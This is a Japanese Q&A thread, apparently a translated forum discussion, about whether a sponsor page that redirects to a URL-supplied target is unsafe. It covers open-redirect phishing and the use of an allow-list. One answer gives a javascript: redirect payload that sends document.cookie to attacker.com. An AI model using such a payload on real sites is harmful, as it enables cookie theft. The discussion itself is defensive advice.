次のような別の Web ページにリダイレクトする Web ページがあります。
http://www.myOtherServer.com/Sponsor.php?RedirectPage=http://mylink.com/whereIwasgoingtogo.html
次に、Sponsor.php ページに、渡された RedirectPage にリンクする「Continue to your page」というリンク付きの広告が表示されます。これに起因するセキュリティ/スプーフィングの問題はありますか? これを処理する最善の方法は何ですか? (ユーザーはどちらのサイトにもログインしていないことに注意してください)
それは大きな問題です。次のようなリンクを送信すると、次のようになります。
http://cnn.com/sponsor.php?redirectpage=http://bit.ly/jh2l14
「ああ、CNN、それは合法的なサイトだ」と思うでしょう。それを開いて、「ページに進む」リンクをクリックします。そして、あなたはネット上で最も厄介なポルノサイトの1つにアクセスし、同僚全員に「ホットくそー私がしたい!@ $ @#$あなたの!(&¤ &^ $§できなくなるまで¡⌐^(!#~~&$ ^#!@ $ !! "そして上司に「CNNだと思った!」と説明する必要があります。
ここの穴はあなたの評判です。このようなブラインドリダイレクトは危険です。
そして、それはただ1つの穴です。これはどう?
http://cnn.com/sponsor.php?redirectpage=javascript:location.href='http://attacker.com/' + document.cookie
これで、サイトをXSS処理して、ユーザーのCookieを盗みました。確かに、ログイン情報がないと言いますが、セッションデータはどうですか?または、後でログインを追加したとき、または社内の他の誰かが1年後にこのページを使用して、ユーザーがログインしたとき。
これは間違いなくセキュリティ上のリスクです。セキュリティが関係する場合は、URL 内変数の使用を避ける必要があります。
完全に安全なものはありませんが、この問題を処理するためのより良い方法は次のとおりです: http://www.webmasterworld.com/forum88/2910.htm
Sponsor.php が RedirectPage に任意の値を許可し、かつ広告が支持を暗示している場合、または自分が正しい道を進んでいると人々に思わせるように促している場合、それをフィッシング攻撃の一部として開いていることになります。さらに悪いことに、これらの攻撃から利益を得ている可能性があり、人々を不快にさせる可能性があります。
許可された URL (またはそれらが従うことができるパターン) のリストを保持することは、問題を防ぐのに大いに役立ちます。